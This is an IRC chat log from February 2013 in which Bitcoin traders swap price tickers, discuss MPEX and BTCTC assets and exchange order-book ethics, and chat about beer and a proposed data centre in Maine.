#ripple-market Feb 17 07:08:19 [MPEX] [S.MPOE] 9392 @ 0.00064332 = 6.0421 BTC [-] Feb 17 07:08:21 [MPEX] [S.MPOE] 384 @ 0.000643 = 0.2469 BTC [-] Feb 17 07:08:23 [MPEX] [S.MPOE] 9474 @ 0.00064268 = 6.0888 BTC [-] Feb 17 07:16:35 xrp? is that ripple? Feb 17 07:16:41 i guess so Feb 17 07:16:53 Yes chaaaaaaang Feb 17 07:17:03 You can't have any Feb 17 07:17:10 Don't bother asking Feb 17 07:21:14 Becuase it's mysterious Feb 17 07:21:52 Xrp = ripple for sure though Feb 17 07:22:11 yup, it's ripple Feb 17 07:22:31 it's very mysterious, and i'd like to buy it Feb 17 07:24:09 im not interested and wont be until they explain how things work:/ Feb 17 07:24:47 also, i do not like debt and well.. it seems all they trade in is debt. Feb 17 07:32:17 selling gold and or silver shipped from the usa, will take btc or ltc, escrow is fine. Feb 17 07:33:08 of gold or of malt liquir? Feb 17 07:33:31 :) i was just being an ass :) Feb 17 07:33:52 most of the time im a cock. Feb 17 07:34:30 im not sure if i will sell in the future but feel free to ask. im sure my price will be better than anyone else. Feb 17 07:34:59 esp better than coinibul Feb 17 07:35:33 1.4 btc per oz? Feb 17 07:35:58 damn i was going to sell at spot. Feb 17 07:36:21 [MPEX] [S.MPOE] 5966 @ 0.00064705 = 3.8603 BTC [+] Feb 17 07:36:23 [MPEX] [S.MPOE] 2999 @ 0.00064739 = 1.9415 BTC [+] Feb 17 07:36:31 i was going to sell 1 oz englhard bars 1 oz each, they have serial numbers on them Feb 17 07:36:48 if shipping to china then yeah Feb 17 07:36:57 gold i have a 1 oz swiss bar Feb 17 07:37:11 i also have 1/10 1/4 and 1/2 krugerands but not at spot Feb 17 07:37:29 i need beer mone Feb 17 07:37:31 money* Feb 17 07:37:39 plus maybe an MBA.... Feb 17 07:37:59 [MPEX] [S.MPOE] 2797 @ 0.00064268 = 1.7976 BTC [-] Feb 17 07:38:01 [MPEX] [S.MPOE] 13050 @ 0.0006425 = 8.3846 BTC [-] Feb 17 07:38:03 [MPEX] [S.MPOE] 6153 @ 0.00064237 = 3.9525 BTC [-] Feb 17 07:38:16 one thing that might hurt me is if the btc price correct down to $20 before i can get beer/education Feb 17 07:38:32 my gold/silver is more or less my fiat savings Feb 17 07:38:46 my low risk savings... Feb 17 07:39:12 I'm a plain ol boring working stiff Feb 17 07:39:25 I have money rolling in all the time Feb 17 07:39:35 no one seems to want to higher me for some odd reason Feb 17 07:40:00 I live check to check and i piss on everything Feb 17 07:40:04 Woohoo Feb 17 07:40:27 checks? what are they again? :) Feb 17 07:40:41 Chaang-Noi you should definitely donate to my save the children fund Feb 17 07:41:00 My children are poor are really would enjoy heat Feb 17 07:41:13 It's nearly freezing outside... Feb 17 07:41:23 lol, i has my own children, and i do donate to kids here in thailand Feb 17 07:41:38 Isee Feb 17 07:41:43 about 5 miles from here there is an orphange for kids with aids, Feb 17 07:41:49 You are a cold hearted bastard Feb 17 07:42:10 I steal power from the local orphanage Feb 17 07:42:24 For nvidia gpu miners Feb 17 07:42:57 lol, did a big christmas thing for the last two years, two years ago took donations from the forum in the form of btc. sadly i converted that to fiat for them. btc was like $3 back then Feb 17 07:49:27 i have no idea about that sort of stuff sorry Feb 17 07:49:41 my wife is more into that kinda stuff than i... Feb 17 07:49:57 and she is not at all into that sorta stuff :) Feb 17 07:50:29 og man, this forum is so fail Feb 17 08:15:40 [MPEX] [S.MPOE] 1322 @ 0.00064739 = 0.8558 BTC [+] Feb 17 08:15:41 [MPEX] [S.MPOE] 3411 @ 0.0006474 = 2.2083 BTC [+] Feb 17 08:34:01 [MPEX] [S.MPOE] 4321 @ 0.00064706 = 2.7959 BTC [-] Feb 17 08:34:08 [MPEX] [S.MPOE] 15427 @ 0.0006474 = 9.9874 BTC [+] Feb 17 08:34:10 [MPEX] [S.MPOE] 7311 @ 0.00064908 = 4.7454 BTC [+] Feb 17 08:52:41 sooo... bitcoin just got mentioned on coast to coast am Feb 17 08:52:55 courtesy of marta mcculler >D Feb 17 09:03:32 cool Feb 17 09:17:02 [MPEX] [S.MPOE] 6050 @ 0.00064718 = 3.9154 BTC [-] Feb 17 09:17:03 [MPEX] [S.MPOE] 21389 @ 0.00064908 = 13.8832 BTC [+] Feb 17 09:17:14 [MPEX] [S.MPOE] 17200 @ 0.00065406 = 11.2498 BTC [+] Feb 17 09:17:17 [MPEX] [S.MPOE] 4950 @ 0.00065691 = 3.2517 BTC [+] Feb 17 09:17:19 [MPEX] [S.MPOE] 411 @ 0.00066206 = 0.2721 BTC [+] Feb 17 09:19:29 [BTCTC] [S.MPOE-PT] 100 @ 0.00068 = 0.068 BTC [-] Feb 17 09:20:36 mircea_popescu Feb 17 09:21:27 just to say that BitVPS shares still appear on STATS, somehow. I guess that was not removed yet. Feb 17 09:23:35 [MPEX] [S.MPOE] 647 @ 0.00064237 = 0.4156 BTC [-] Feb 17 09:23:37 [MPEX] [S.MPOE] 4321 @ 0.00064231 = 2.7754 BTC [-] Feb 17 09:23:48 [MPEX] [S.MPOE] 6732 @ 0.0006423 = 4.324 BTC [-] Feb 17 09:27:02 [BTCTC] [S.DICE-PT] 6040 @ 0.0063 = 38.052 BTC [+] Feb 17 09:27:54 I'll need more S.DICE soon at this rate... Feb 17 09:32:21 [BTCTC] [BTC-BOND] 4 @ 0.00999 = 0.04 BTC [+] Feb 17 09:34:23 [BTCTC] [BTC-BOND] 563 @ 0.01 = 5.63 BTC [+] Feb 17 09:41:20 Someone's been buying a lot of my stuff it seems. Feb 17 09:41:38 and bitcointalk seems like it's perpetually having problems loading this past week. Feb 17 09:41:44 [BTCTC] [GSDPT] 6000 @ 0.0064 = 38.4 BTC [+] Feb 17 09:41:54 [BTCTC] [GSDPT] 3000 @ 0.00649 = 19.47 BTC [+] Feb 17 09:42:03 [BTCTC] [GSDPT] 1 @ 0.00687 BTC [+] Feb 17 09:44:08 At last some GSDPT movement Feb 17 09:45:58 that puts sdice pretty evenly priced on all exchanges now Feb 17 09:46:04 other than havelock Feb 17 09:46:12 yeah Feb 17 09:46:14 indeed Feb 17 09:51:44 Do you know if Deprived hangs out in here? Feb 17 09:55:26 I think he is around here sometimes indeed Feb 17 09:56:42 thanks Feb 17 10:03:00 [MPEX] [S.MPOE] 4321 @ 0.00065058 = 2.8112 BTC [+] Feb 17 10:03:02 [MPEX] [S.MPOE] 13229 @ 0.00065091 = 8.6109 BTC [+] Feb 17 10:19:27 [MPEX] [S.MPOE] 4271 @ 0.00065091 = 2.78 BTC [+] Feb 17 10:19:29 [MPEX] [S.MPOE] 3842 @ 0.00065199 = 2.5049 BTC [+] Feb 17 10:19:31 [MPEX] [S.MPOE] 3939 @ 0.00065446 = 2.5779 BTC [+] Feb 17 10:19:32 [MPEX] [S.MPOE] 6048 @ 0.00065886 = 3.9848 BTC [+] Feb 17 10:23:44 !ticker btctc bitvps Feb 17 10:23:45 [BTCT:BITVPS] 1D: 0.00449 / 0.0045 / 0.00449 (510 shares, 2.3 BTC), 7D: 0.00449 / 0.0 / 0.0045 (610 shares, 2.7 BTC), 30D: 0.00449 / 0.0 / 0.0045 (610 shares, 2.7 BTC) Feb 17 10:23:56 wow Feb 17 10:27:50 yeah, I'm surprised too Feb 17 10:28:09 A bit out of whack, especially since we're not turning a profit at all, at least right now. Feb 17 10:28:35 We should soon have another owned server. That should slash ~600 USD a month in rent fees. Feb 17 10:29:17 But with BTC rising much faster than our USD profits... Feb 17 10:29:40 Our price are adjusted based on rate after all. More USD/BTC, less BTC we get. Feb 17 10:35:50 What is bitvps exactly? Feb 17 10:35:58 [MPEX] [S.MPOE] 4321 @ 0.00064584 = 2.7907 BTC [-] Feb 17 10:36:00 [MPEX] [S.MPOE] 9679 @ 0.00064555 = 6.2483 BTC [-] Feb 17 10:41:46 It's BitVPS Feb 17 10:42:06 the most reknown server provider in Bitcoins Feb 17 10:42:18 [MPEX] [S.MPOE] 4321 @ 0.00064568 = 2.79 BTC [+] Feb 17 10:42:20 [MPEX] [S.MPOE] 7921 @ 0.00064555 = 5.1134 BTC [-] Feb 17 10:42:40 We're hosting slush's pool and clarkmoody.com among other notorious bitcoin websites. Feb 17 11:02:35 [BTCTC] [COGNITIVE] 2 @ 0.331 = 0.662 BTC [-] Feb 17 11:03:08 [BTCTC] [COGNITIVE] 3 @ 0.33 = 0.99 BTC [-] Feb 17 11:03:10 [BTCTC] [COGNITIVE] 1 @ 0.33 BTC [-] Feb 17 11:06:43 [MPEX] [S.MPOE] 9400 @ 0.00064368 = 6.0506 BTC [-] Feb 17 11:07:07 Sounds good. Thanks. **** BEGIN LOGGING AT Sun Feb 17 16:32:21 2013 Feb 17 16:32:58 Ah, well it's late. I'm out. Feb 17 16:33:13 nn Feb 17 16:33:41 ah i cant argue mircea_popescu against Namworld_afk in the btct.co order matching issue Feb 17 16:33:52 eh ? Feb 17 16:34:52 why doesn't mpex allow asset issuers and the exchange to present a deliberately false picture of asset demand by allowing a user to bid up to his total balance for eash mpsic? Feb 17 16:34:59 http://polimedia.us/dtng/c/src/136104976652.jpg pic related. Feb 17 16:35:39 pigeons because mpex is built to be fast. when a new order comes in the trade engine does not have the time to check if its book is covered. Feb 17 16:35:40 instead of requiring full collateral to back each order Feb 17 16:35:53 oh so its only for speed? Feb 17 16:36:13 no, it's not only for speed Feb 17 16:36:18 but speed is a sufficient consideration :D Feb 17 16:36:40 are the non-speed issues sufficient consideration? Feb 17 16:38:11 i am not at liberty to comment on that issue. Feb 17 16:38:46 of course they are. the only reason irl books contain unpaid orders is because they are still binding, but irl has credit. Feb 17 16:39:02 and people don't get to put things in the book that aren't credit-worthy and leverage-able over their eyes. Feb 17 16:40:28 would you say btctc/ltcglobal should remove the false bidding power? Or that it's no biggie? Feb 17 16:41:17 it's also a race condition waiting to happen, which they'll discover just as soon as rthey're forced to implement multimachine systems Feb 17 16:41:27 which is quite possibly "never", so why shouldn't they have their fun ? Feb 17 16:41:40 [BTCTC] [ESECURITYSABTC] 2 @ 0.71 = 1.42 BTC [-] Feb 17 16:42:42 in the case of orders backed by credit, those are acutally backed by credit, unbacked orders don't contribute less to distortion just because margin exist Feb 17 16:43:17 yes, the confusion here is between "i feel i could afford a car" and "i can actually afford a car". Feb 17 16:43:27 the latter can be the case even if you have no more than 3 dollars in your pocket. Feb 17 16:44:17 [MPEX] [S.MPOE] 4000 @ 0.0006567 = 2.6268 BTC [+] Feb 17 16:45:34 i think intentionally profiting from a distored picture of demand and liquidity is unethical Feb 17 16:46:01 just sat back down Feb 17 16:46:10 [BTCTC] [S.MPOE-PT] 6 @ 0.00068 = 0.0041 BTC [-] Feb 17 16:46:11 i have already stated my opinion on it, not going to rehash it Feb 17 16:47:12 i used to think that they should do what they like, even though you are right, but now i think all these little innacuracies add up and we shoulod draw the line sooner Feb 17 16:47:27 pigeons that may be. it is also a self-limiting disease so. Feb 17 16:50:53 all orders flushed. Feb 17 16:52:01 and i just sent a 1338 byte tx. sooo close! Feb 17 16:54:04 Sold a kid with braces 20BTC yesterday Feb 17 16:54:13 lol Feb 17 16:54:21 he was like... I can't buy into the stock market yet Feb 17 16:54:27 so I'll trade BTC Feb 17 16:54:38 how old? Feb 17 16:54:44 I bought me first coins a month and a half ago and I'm up $10 / coin Feb 17 16:54:54 prob 16-18 Feb 17 16:54:59 he could drive Feb 17 16:55:05 now do it with a girl. Feb 17 16:55:13 lol Feb 17 16:55:16 :D Feb 17 16:55:41 coinbase I think is really making the US retail market explode Feb 17 16:56:22 kids are smart Feb 17 16:56:25 coast to coast am got a question from a marti in romania yest Feb 17 16:56:32 which made them mention bitcoin on teh airs. Feb 17 16:56:40 they were like "o, i hear it's big in europe" Feb 17 16:56:52 about 10 minutes after going "o, yurpeans are a lot more sensible about money and stuff" Feb 17 16:57:09 cool Feb 17 16:57:22 [MPEX] [S.MPOE] 2335 @ 0.0006567 = 1.5334 BTC [+] Feb 17 16:57:23 [MPEX] [S.MPOE] 22865 @ 0.0006583 = 15.052 BTC [+] Feb 17 16:58:09 lol Feb 17 16:58:21 is george noore still doing that? Feb 17 16:58:29 who is current host Feb 17 16:58:48 they must have loved the meteor Feb 17 16:59:39 nah some guy wells Feb 17 17:00:09 [MPEX] [S.MPOE] 4321 @ 0.00065506 = 2.8305 BTC [-] Feb 17 17:00:12 [MPEX] [S.MPOE] 19843 @ 0.00065492 = 12.9956 BTC [-] Feb 17 17:00:14 [MPEX] [S.MPOE] 336 @ 0.0006525 = 0.2192 BTC [-] Feb 17 17:00:44 Art bell was da best Feb 17 17:01:24 i never followed it Feb 17 17:01:44 ;;ticker Feb 17 17:01:44 BTCUSD ticker | Best bid: 26.43004, Best ask: 26.50000, Bid-ask spread: 0.06996, Last trade: 26.42003, 24 hour volume: 37853.90052231, 24 hour low: 26.08801, 24 hour high: 27.40000, 24 hour vwap: 26.82858 Feb 17 17:05:20 pigeons do you happen to have somewhere nearby the famous "with blood sweat and tears" email from our friend tom ? Feb 17 17:05:49 no Feb 17 17:06:08 tom williams neither Feb 17 17:07:09 i listended to coast to coast years ago but when it was people calling in saying" oh my god i looked at my clock and it was 2:22, there are no coincidences" i had to give it up Feb 17 17:07:44 "like a few weeks later, i thought about it and looked at a different clock and it was 3:33 Feb 17 17:08:07 what does it mea??? Feb 17 17:08:10 mean Feb 17 17:09:19 thye regularly had whole shows where everyone would call in and tell about how that happens when they look at the clock too Feb 17 17:09:41 http://trilema.com/2013/whats-a-sperglord/ there we go. Feb 17 17:10:01 pigeons supposedly there's ~4-5 mn listeners that got hit Feb 17 17:10:08 prolly 1-5% of them had heard of bitcoin prevbiously Feb 17 17:10:10 Now this is a chat where it is at... Feb 17 17:10:20 prolly 90% of them would fit like toes in a silk stocking on bitcointalk Feb 17 17:10:24 ;;ticker Feb 17 17:10:25 BTCUSD ticker | Best bid: 26.45000, Best ask: 26.50000, Bid-ask spread: 0.05000, Last trade: 26.45000, 24 hour volume: 38095.04921954, 24 hour low: 26.08801, 24 hour high: 27.40000, 24 hour vwap: 26.82461 Feb 17 17:10:56 or at least those are my figures. Feb 17 17:11:42 This article is available for a fee. So sad... Feb 17 17:11:45 ;) Feb 17 17:12:04 o ? your name is new, how did you run out of credits ? Feb 17 17:12:23 never had any... that is how new I be Feb 17 17:12:28 thanks for the concern... Feb 17 17:12:32 you get like 5 each week Feb 17 17:12:44 possibly you're on a shared ip or something but hot damn. Feb 17 17:13:23 right over my head mircea_popescu Feb 17 17:13:31 have to slow it down for this nub Feb 17 17:13:41 5 each week where and how Feb 17 17:13:43 [MPEX] [S.MPOE] 1410 @ 0.0006583 = 0.9282 BTC [+] Feb 17 17:13:45 [MPEX] [S.MPOE] 4321 @ 0.00065885 = 2.8469 BTC [+] Feb 17 17:13:45 [MPEX] [S.MPOE] 2819 @ 0.00065886 = 1.8573 BTC [+] Feb 17 17:13:57 trilema identifies users by ip. you not having credits means someone read 5+ articles this week from yoru very ip Feb 17 17:14:21 must be me. Feb 17 17:14:23 I read a few Feb 17 17:14:46 doubt anyone else in Indonesia reading your stuff at the moment. Feb 17 17:15:33 ah ok. Feb 17 17:15:40 lol Feb 17 17:15:45 Nice feature Feb 17 17:15:57 hooked me already with your written work Feb 17 17:15:59 l) Feb 17 17:16:29 silghtly annoying that I can't have 2 ips linked to my credits though. Feb 17 17:16:40 gotta reestablish credentials when I take laptop to work Feb 17 17:16:42 and back Feb 17 17:17:14 [HAVELOCK] [KCIM] 5 @ 0.99 = 4.95 BTC [-] Feb 17 17:17:43 Bugpowder if you get a pw you can have as many as you want Feb 17 17:17:56 you can load the respective cookie in 500 systems. Feb 17 17:18:26 how many credits does EskimoBob have? Feb 17 17:18:27 ok I will try that Feb 17 17:18:36 Guessing I am going to have to do a lot of homework to make it worth my while to use MPEx... not really for the novice is it? Feb 17 17:18:58 Bicknellski well look at it this way : are you interested in bitcoin to learn/widen horizons or to feed yourself ? Feb 17 17:20:17 Definitely... Im a Montessori teacher so we are by nature trained be just that widening horizons and feed our selves to fit in the environment we create for our students Feb 17 17:20:52 love to learn new stuff especially from people who have the right vision and clarity. Feb 17 17:20:53 cool. so then : yes you'll have to do a ton of reading. Feb 17 17:20:59 love your perspective on things Feb 17 17:21:02 mpex is awesome Feb 17 17:21:08 it does have a learning curve Feb 17 17:21:11 figured as much blech Feb 17 17:21:13 Bugpowder nu-uh! read the forums! Feb 17 17:21:15 nothing great is easy Feb 17 17:21:40 [MPEX] [S.MPOE] 2404 @ 0.00065886 = 1.5839 BTC [+] Feb 17 17:22:46 which link above to the forums. Feb 17 17:23:00 hm Feb 17 17:23:06 ;;google site:bitcointalk.org mpex sucks Feb 17 17:23:07 So you think you're going to start a Bitcoin business, right?: ; [MPEx] CDO roll call for bond issuers: ; Print Page - MPEx Accounts Spring Scrub, 2013: Feb 17 17:23:13 [HAVELOCK] [HIM] 1 @ 14.1 BTC [+] Feb 17 17:23:25 eh um. i give. Feb 17 17:23:28 Merci Feb 17 17:23:29 ;;google mpex is teh sux Feb 17 17:23:30 Strobist: What China Doesn't Understand: ; Mogliamante pe Trilema - Un blog de Mircea Popescu.: ; The greatest smartphone app… pe Trilema - Un blog de Mircea ...: Feb 17 17:24:06 how the hell does my review of mogliamante come into that Feb 17 17:24:17 you know sometimes i suspect google algo is broken. Feb 17 17:24:34 if i was cool I'd set my name to Bicknellski away getting eduficated. Feb 17 17:25:10 o, is Bicknellski your irl pw:rn ? Feb 17 17:25:39 anyone here like beer? Feb 17 17:25:51 yea what you said... whoosh right over the nubs head... ya IPA please Feb 17 17:25:55 or a blue Feb 17 17:26:21 http://cheezburger.com/4669066240 Feb 17 17:26:35 Stone IPA Feb 17 17:26:43 or Ruination Feb 17 17:26:57 Weihenstephaner Korbinian Feb 17 17:26:59 pw:rn aka powerword:real name. it uses some tabletop game reference to slightly chuckle at how concerned people are with "their real name" Feb 17 17:27:06 which is quite magical thinking at its core Feb 17 17:27:32 i love Ruination Feb 17 17:27:39 what is ruination ? Feb 17 17:27:54 very hoppy IPA Feb 17 17:27:58 from Stone Feb 17 17:28:40 oh teh beerz Feb 17 17:30:03 Or... Maudite Feb 17 17:30:13 got one of those at the back of the cooler Feb 17 17:30:28 yeah dats good Feb 17 17:30:40 best I have had is Russian River Supplication though Feb 17 17:30:44 Or Canadian (Indian Pale Ale) Feb 17 17:30:51 to spendy though Feb 17 17:30:51 cant remember who brews it Feb 17 17:30:53 Molson? Feb 17 17:30:54 $13 / bottle Feb 17 17:30:57 or Labatts Feb 17 17:31:05 Pliny the Elder is a great IPA as well Feb 17 17:31:12 I want to try it Feb 17 17:31:17 don't have distro in DC Feb 17 17:31:30 found it online once Feb 17 17:31:37 haven't looked lately Feb 17 17:31:40 Ok so Microbrew check Feb 17 17:31:51 Intelligent conversation check Feb 17 17:32:14 ... people that lead you around by the nose till you can communicate effectively and not be stupid... check Feb 17 17:32:34 be back in 6 months ish when the initiation is over lol Feb 17 17:33:01 the initiation is buying into a bubble and losing half your coins Feb 17 17:33:03 OR Feb 17 17:33:11 buying GLBSE stocks Feb 17 17:33:42 maybe no initiation for you though Feb 17 17:34:35 im sure he'll find something to buy into and lose all his coins Feb 17 17:34:46 !ticker m s.bbet Feb 17 17:34:48 [MPEX:S.BBET] 1D: 0.00165 / 0.00193191 / 0.001965 (18002 shares, 34.78 BTC), 7D: 0.001599 / 0.00188869 / 0.001965 (25302 shares, 47.79 BTC), 30D: 0.0003 / 0.00129541 / 0.001965 (139210 shares, 180.33 BTC) Feb 17 17:34:57 good choice Feb 17 17:34:58 ok wtf happened here. 200 ? what, srsly ? Feb 17 17:34:59 :-P Feb 17 17:35:05 seeriously Feb 17 17:35:12 I dumped at 30000 Feb 17 17:35:18 OOOOPS Feb 17 17:35:25 ya I get that... Feb 17 17:35:36 The nice thing is Feb 17 17:35:44 sometimes the initiation is you double your coins Feb 17 17:36:19 haha this is also true. Feb 17 17:36:27 Unfortunately I dont like gambling so I am hopeful not to buy into something and lose the few coins I can afford to lose Feb 17 17:36:35 then you get overconfident Feb 17 17:36:35 not a very addictive personality. Feb 17 17:36:40 truth of the matter is, mpex is liquid to the tune of 1-200k btc a month, but volatile to the tune of 1-500% a month too Feb 17 17:36:41 and buy puts Feb 17 17:36:54 and with age not so worried about proving anything. Feb 17 17:37:03 Bugpowder just like in the real market amirite ? Feb 17 17:37:03 if had to pick only one, the one you could not pick you could not have for the rest of your life.. options are beer or btc, what do you pick? Feb 17 17:37:10 btc. Feb 17 17:37:16 i think i drunk a liter of beer in my entire life Feb 17 17:37:25 dont do it again! Feb 17 17:37:40 yep Feb 17 17:37:48 just more volitile Feb 17 17:37:52 way Feb 17 17:38:03 beer I can pass up these days drank my fill when I was younger Feb 17 17:38:07 with experience im realising this is the main warning actual people need re mpex. Feb 17 17:38:29 i don't think anyone natively realises just how god damned volatile it is, even if they be otherwise sane and educated/experienced traders whatnot Feb 17 17:39:09 well if they're otherwise sane, educated, and experienced they'd probably realize that pretty quickly Feb 17 17:39:16 yeah. Feb 17 17:39:27 then again that's what Bugpowder was saying... it takes a slap in the face Feb 17 17:39:38 "fuck you bitch, i can remain insane longer than you can remain solvent" Feb 17 17:39:50 indeed Feb 17 17:39:55 but that's how most learning is done anyway Feb 17 17:40:00 i guess that's true Feb 17 17:41:27 so fear is a good friend to have. Feb 17 17:41:31 nice to know Feb 17 17:41:50 "if you're not afraid you're not paying attention" or something like that. Feb 17 17:43:17 If you think your business plan has to be kept secret because otherwise others will steal it you are probably too stupid to be in business (not just BTC, but in general). Feb 17 17:43:25 LOL comedy. Feb 17 17:43:57 Ya flown planes before it is a lot like that... Feb 17 17:54:24 [BTCTC] [B.YABMC] 1 @ 0.02094 BTC [-] Feb 17 18:01:19 [BTCTC] [BTC-BOND] 30 @ 0.00986 = 0.2958 BTC [-] Feb 17 18:01:21 [BTCTC] [BTC-BOND] 43 @ 0.00986 = 0.424 BTC [-] Feb 17 18:02:14 [BTCTC] [BASIC-MINING] 2 @ 0.35 = 0.7 BTC [+] Feb 17 18:03:09 [BTCTC] [BTC-BOND] 2 @ 0.01 = 0.02 BTC [+] Feb 17 18:04:15 Namworld_afk: you there? Feb 17 18:04:53 nevermind, I looked it up myself Feb 17 18:06:05 ;;ticker Feb 17 18:06:05 BTCUSD ticker | Best bid: 26.34001, Best ask: 26.40300, Bid-ask spread: 0.06299, Last trade: 26.30116, 24 hour volume: 40871.65631664, 24 hour low: 26.06000, 24 hour high: 27.40000, 24 hour vwap: 26.78838 Feb 17 18:06:16 ;;ticker btcmc Feb 17 18:06:16 (ticker [--bid|--ask|--last|--high|--low|--avg] [--currency XXX]) -- Return pretty-printed mtgox ticker. If one of the result options is given, returns only that numeric result (useful for nesting in calculations). If '--currency XXX' option is given, returns ticker for that three-letter currency code. It is up to you to make sure that the three letter code you enter is a valid currency (1 more message) Feb 17 18:06:21 er Feb 17 18:06:24 !ticker btcmc Feb 17 18:06:25 The eagle never lost so much time as when he submitted to learn from the crow. Feb 17 18:10:01 wait, btcmc never relisted anywhere did iyt Feb 17 18:13:45 ;;ticker --last Feb 17 18:13:49 26.26140 Feb 17 18:15:47 [BTCTC] [B.YABMC] 1 @ 0.01653 BTC [-] Feb 17 18:15:49 [BTCTC] [B.YABMC] 1 @ 0.01652 BTC [-] Feb 17 18:15:51 [BTCTC] [B.YABMC] 50 @ 0.0165 = 0.825 BTC [-] Feb 17 18:16:36 [MPEX] [S.DICE] 1000 @ 0.00657819 = 6.5782 BTC [-] Feb 17 18:16:58 hey Namworld_afk what are the chances of getting a financial update for bvps? I was actually kind of expecting it with the btct listing :/ Feb 17 18:22:37 ;;ticker Feb 17 18:22:38 BTCUSD ticker | Best bid: 25.50000, Best ask: 25.70000, Bid-ask spread: 0.20000, Last trade: 25.70000, 24 hour volume: 47618.69244929, 24 hour low: 25.50000, 24 hour high: 27.40000, 24 hour vwap: 26.65796 Feb 17 18:25:48 ;;ticker Feb 17 18:25:48 BTCUSD ticker | Best bid: 25.00194, Best ask: 25.70000, Bid-ask spread: 0.69806, Last trade: 25.00194, 24 hour volume: 52259.12969220, 24 hour low: 25.00000, 24 hour high: 27.40000, 24 hour vwap: 26.52656 Feb 17 18:26:25 ;;ticker Feb 17 18:26:26 BTCUSD ticker | Best bid: 25.00000, Best ask: 25.75000, Bid-ask spread: 0.75000, Last trade: 25.00000, 24 hour volume: 52347.58935410, 24 hour low: 25.00000, 24 hour high: 27.40000, 24 hour vwap: 26.52406 Feb 17 18:26:30 crikey, nosedive Feb 17 18:26:40 i hope m t w gets a boost from media attention. Feb 17 18:29:50 ;;ticker Feb 17 18:29:51 BTCUSD ticker | Best bid: 25.00000, Best ask: 25.20000, Bid-ask spread: 0.20000, Last trade: 25.00000, 24 hour volume: 52704.76362301, 24 hour low: 25.00000, 24 hour high: 27.40000, 24 hour vwap: 26.51089 Feb 17 18:29:55 going down Feb 17 18:30:03 ;;goxlag Feb 17 18:30:05 237.206307 seconds Feb 17 18:32:40 https://bitcointalk.org/index.php?topic=77469.msg1534415#msg1534415 Feb 17 18:32:42 wow Feb 17 18:33:04 wow at gox lag Feb 17 18:34:58 wonder if hte api lags also Feb 17 18:35:00 when the site does Feb 17 18:35:15 the* Feb 17 18:36:44 Ukto, Chaang-Noi, DeadWeasel, mircea_popescu, Namworld_afk, EskimoBob: ^ Feb 17 18:38:34 ? Feb 17 18:39:08 im going to bed, night all Feb 17 18:39:49 Nite Feb 17 18:40:07 So, basically, in the end, I can pay back what was originally paid out, give or take. Feb 17 18:41:27 Diablo-D3: So lucky then... will you ever do this again? Feb 17 18:41:41 I think so. Feb 17 18:41:50 I still think the original plan works. Feb 17 18:42:59 Id like to learn more ... got read 40 pages in that thread Feb 17 18:43:00 lol Feb 17 18:43:04 ;;ticker Feb 17 18:43:04 BTCUSD ticker | Best bid: 25.92338, Best ask: 25.92440, Bid-ask spread: 0.00102, Last trade: 25.92338, 24 hour volume: 54018.28756317, 24 hour low: 25.00000, 24 hour high: 27.40000, 24 hour vwap: 26.49505 Feb 17 18:44:44 So the plan for maine? Feb 17 18:44:48 [MPEX] [S.MPOE] 4321 @ 0.00065274 = 2.8205 BTC [-] Feb 17 18:44:50 [MPEX] [S.MPOE] 7792 @ 0.00065253 = 5.0845 BTC [-] Feb 17 18:44:52 [MPEX] [S.MPOE] 487 @ 0.0006525 = 0.3178 BTC [-] Feb 17 18:45:21 where would you get the asics? Feb 17 18:45:33 the asics are going to be dropped from the dmc 2.0 plan Feb 17 18:45:42 really Feb 17 18:45:45 huh? Feb 17 18:46:04 but doesnt asicminer? have a viable option? Feb 17 18:46:10 maybe. Feb 17 18:46:28 see, the plan was three fold Feb 17 18:46:32 I would think it is the best route no? Feb 17 18:46:40 considering electricity Feb 17 18:46:45 1) break even or even exceed power usage generating our own power Feb 17 18:47:16 2) focus on customers that want to do high density computing, renting racks for $20-30k/mo Feb 17 18:47:44 3) use 2-3 racks for ASICs, out of 2-3 dozen. Feb 17 18:48:05 So why the US? Feb 17 18:48:17 because most customers need to have their computers racked in the US Feb 17 18:48:28 just easier for you to get everything cheap I guess Feb 17 18:48:36 power, building etc Feb 17 18:48:59 maine is also very close to the ny/boston/toronto information corridor Feb 17 18:49:19 which is where most of the world's internet traffic goes through Feb 17 18:49:27 ya makes sense Feb 17 18:49:39 so huge part is the rental Feb 17 18:49:44 yes Feb 17 18:49:48 that offsets everything Feb 17 18:49:52 new england is also good because of the higher $/kWh Feb 17 18:49:59 davos: yes, but thats two fold Feb 17 18:50:07 if you're producing your own power Feb 17 18:50:07 without the generating electricity part, that'd be the biggest problem Feb 17 18:50:09 HOWEVER Feb 17 18:50:14 [MPEX] [S.MPOE] 2029 @ 0.00065886 = 1.3368 BTC [+] Feb 17 18:50:16 [MPEX] [S.MPOE] 4321 @ 0.00066024 = 2.8529 BTC [+] Feb 17 18:50:18 [MPEX] [S.MPOE] 12150 @ 0.00066025 = 8.022 BTC [+] Feb 17 18:50:20 large industrial customers pay much less Feb 17 18:50:26 Ya... Feb 17 18:50:27 I mean much much less Feb 17 18:50:35 volume Feb 17 18:50:41 they pay what industrial customers pay across the nation, instead of high maine prices Feb 17 18:51:06 [BTCTC] [BASIC-MINING] 2 @ 0.35 = 0.7 BTC [+] Feb 17 18:51:07 national grid pricing - which is what you'd be getting paid for surplus e2 Feb 17 18:51:13 not looked into other countries for something similar? Feb 17 18:51:18 its quirk of maine pricing, they only gouge residential and commercial Feb 17 18:51:26 or say secondary roll out? Feb 17 18:51:32 Bicknellski: maybe secondary roll outs Feb 17 18:51:35 but not the original Feb 17 18:51:52 maybe china or india Feb 17 18:52:15 for international you'd probably want to move upchain rather than down - do EU and get the tax benes and such for the power Feb 17 18:52:33 closer to chips in China Feb 17 18:52:42 lol build your own asics Feb 17 18:52:43 lol Feb 17 18:53:31 meh. for chips you airfreight anyway - time isn't THAT big of a deal Feb 17 18:54:26 so says BFL Feb 17 18:54:26 lol Feb 17 18:55:11 It be interesting to have something akin to your idea scaled down in Indonesia Feb 17 18:55:37 lots of unused manufacturing properties in Jakarta Feb 17 18:55:39 yeah, Im not interested in areas of hte world that constantly suffer from national or social disasters Feb 17 18:55:51 i'd probably go with something more like denmark - if you can get a permit for a 30m tower @ 35 KW in the $350k range pre-benes; then get decent network rates on surplus e2 Feb 17 18:56:01 no flooding, no tornadoes, no hurricanes Feb 17 18:56:11 not to mention a shitty grid Feb 17 18:56:14 and no earthquakes Feb 17 18:56:20 Ya for your model Feb 17 18:56:34 ... if your rent server racks Feb 17 18:56:43 like, all those DCs in washington dc, north virginia, and NYC? fuck that shit Feb 17 18:56:49 but that must be a hard sell Feb 17 18:57:04 Bicknellski: btw, its with power included and unlimited power Feb 17 18:57:25 a lot of racks down at around $5k 